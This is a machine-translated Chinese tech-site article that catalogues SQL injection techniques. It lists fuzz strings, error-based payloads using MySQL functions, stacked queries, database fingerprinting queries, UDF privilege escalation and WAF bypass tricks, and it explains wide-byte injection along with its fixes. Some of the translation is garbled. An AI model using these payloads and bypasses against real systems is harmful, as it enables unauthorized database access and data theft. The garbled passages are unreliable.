Shulou(Shulou.com)06/01 Report--

This article mainly introduces "WEB security SQL injection vulnerability knowledge points what", in daily operation, I believe many people in WEB security SQL injection vulnerability knowledge points what problems there are doubts, Xiaobian consulted all kinds of information, sorted out simple and easy to use operation methods, hope to answer "WEB security SQL injection vulnerability knowledge points what" doubts help! Next, please follow the small series to learn together!

SQL injection vulnerability

3.1.1. injection classification

SQL injection is a code injection technique used to attack data-driven applications. In an application, not filtering properly can allow malicious SQL statements to be inserted into input fields for execution (for example, dumping database contents to an attacker).

3.1.1.1. Categories by skill

Depending on the technique used, SQL injection types can be divided into

● Blinding

Boolean blind: Boolean values after statement execution can only be inferred from application returns

Time blind: The application has no explicit echo and can only be judged using a specific time function

● Error injection: The application will display all or part of the error message

● Stack injection: some applications can be added; after one execution of multiple statements

● Other

3.1.1.2. Classified by way of data acquisition

In addition, it can be divided into three categories according to the way the data is obtained

● inband

Leveraging Web Applications to Get Data Directly

If wrong injection

is to extract data through site responses or error feedback.

● inference

Inferring data from some reflection of the Web

such as Boolean blind injection and stack injection

That's what we call blind betting,

Infer data from other changes in web apps

● out of band(OOB)

Get data via other means of transmission, such as DNS resolution protocols and email

3.1.2. injection detection

3.1.2.1. Common injection points

● GET/POST/PUT/Delete parameters

● X-Forwarded-For

● File name

3.1.2.2. Fuzz injection point

● ' / "

● 1/1

● 1/0

● and 1=1

● " and "1"="1

● and 1=2

● or 1=1

● or 1=

● ' and '1'='1

● + - ^ * % /

● > || | & &&

● ~

● !

● @

● Back quotes execution

3.1.2.3. test constant

● @@version

● @@servername

● @@language

● @@spid

3.1.2.4. Number of test columns

For example:

http://www.foo.com/index.asp? id=12+union+select+nulll,null--, increasing null until no return.

3.1.2.5. error injection

● select 1/0

● select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a

● extractvalue(1, concat(0x5c,(select user())))

● updatexml(0x3a,concat(1,(select user())),1)

● exp(~(SELECT * from(select user())a))

● ST_LatFromGeoHash((select * from(select * from(select user())a)b))

● GTID_SUBSET(version(), 1)

3.1.2.5.1. Error injection based on geometric

● GeometryCollection((select * from (select * from(select user())a)b))

● polygon((select * from(select * from(select user())a)b))

● multipoint((select * from(select * from(select user())a)b))

● multilinestring((select * from(select * from(select user())a)b))

● LINESTRING((select * from(select * from(select user())a)b))

● multipolygon((select * from(select * from(select user())a)b))

It should be noted that error injection based on the exp function is no longer effective in MySQL versions after 5.5.49. For details, please refer to this commit 95825f.

Geometric-based error injection in the above list is fixed in this commit 5caea4 and no longer works in later versions of 5.5.x.

3.1.2.6. stack implantation

● ;select 1

3.1.2.7. comment character

● #

● --+

● /*xxx*/

● /*! xxx*/

● /*! 50000xxx*/

3.1.2.8. judge filter rule

● Is there trunc

● Whether to filter a character

● Whether to filter keywords

Slash and coding

3.1.2.9. access to information

● Determine database type

and exists (select * from msysobjects ) > 0 access database

and exists (select * from sysobjects ) > 0 SQL Server Database

● Judge database table

and exsits (select * from admin)

● Version, hostname, username, library name

Tables and fields

Order By Select Into

Table name, column name

3.1.2.10. Test permissions

● File operation

Read sensitive documents

Write Shell

● Out-of-band channel

network request

3.1.3. privilege escalation

3.1.3.1. UDF rights

UDF (User Defined Function) is a function provided by MySQL, which can be extended by adding new functions to MySQL by writing DLL extensions.

Once you have MySQL privileges, you can upload custom extension files in this way and execute system commands from MySQL.

3.1.4. database for the determination

3.1.4.1. MySQL

● sleep sleep(1)

● benchmark BENCHMARK(5000000, MD5('test'))

● String connections

SELECT 'a' 'b'

SELECT CONCAT('some','string')

● version

SELECT @@version

SELECT version()

● Identification function

connection_id()

last_insert_id()

row_count()

3.1.4.2. Oracle

● String connections

'a'||'oracle' --

SELECT CONCAT('some','string')

● version

SELECT banner FROM v$version

SELECT banner FROM v$version WHERE rownum=1

3.1.4.3. SQLServer

● WAITFOR WAITFOR DELAY '00:00:10';

● SERVERNAME SELECT @@SERVERNAME

● version SELECT @@version

● String connections

SELECT 'some'+'string'

● Constant

@@pack_received

@@rowcount

3.1.4.4. PostgreSQL

● sleep pg_sleep(1)

3.1.5. bypass technique

● Code bypass

case

URL-encoded

HTML encoding

hexadecimal encoding

Unicode encoding

● Comments

// -- -- + -- - # /** / ;

Inline comments use more, it has a property/!**/ Only MySQL can recognize it.

e.g. index.php? id=-1 /*! UNION*/ /*! SELECT*/ 1,2,3

● When filtered only once

union => ununionion

● Same function replacement

● Function replacement

substring / mid / sub

ascii / hex / bin

benchmark / sleep

● Variable substitution

user() / @@user

● Symbols and keywords

and / &

or / |

HTTP parameters

HTTP parameter pollution

id=1&id=2&id=3 Different results depending on the container

HTTP Split Injection

● Buffer overflow

Some C WAFs handle strings of limited length, and payloads beyond a certain length may not be processed.

● When there is a length limit for secondary injection, the length of the field in the database is changed by multi-sentence execution. Bypass

3.1.6. SQL injection tips

3.1.6.1. wide byte injection

When programming with gbk code, programmers usually use set names 'gbk' to set it

set

character_set_connection = 'gbk',

character_set_result = 'gbk',

character_set_client = 'gbk';

The vulnerability occurs because set character_set_client = 'gbk'; is executed, and mysql assumes that the data passed by the client is gbk encoded, so it uses gbk to decode, while mysql_real_escape is executed before decoding. However, if you use set names 'gbk' directly, real_escape will add %5c if you don't know the encoding of the set data. At this point, the server gets the data decoding and thinks that the submitted character +%5c is a character of gbk, which creates a vulnerability.

There are three ways to solve this problem. The first way is to set the charset of the client to binary, so that no decoding operation will be done. The second is mysql_set_charset ('gbk '), where the encoded information is stored in the connection to the database, and this problem does not occur. The third is to use PDO.

There are other coding tricks, such as latin will discard invalid unicode, then admin%32 is not equal to admin in code, but will be equal to admin in database comparison.

At this point, the study of "What are the knowledge points of SQL injection vulnerabilities in WEB security" is over, hoping to solve everyone's doubts. Theory and practice can better match to help everyone learn, go and try it! If you want to continue learning more relevant knowledge, please continue to pay attention to the website, Xiaobian will continue to strive to bring more practical articles for everyone!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.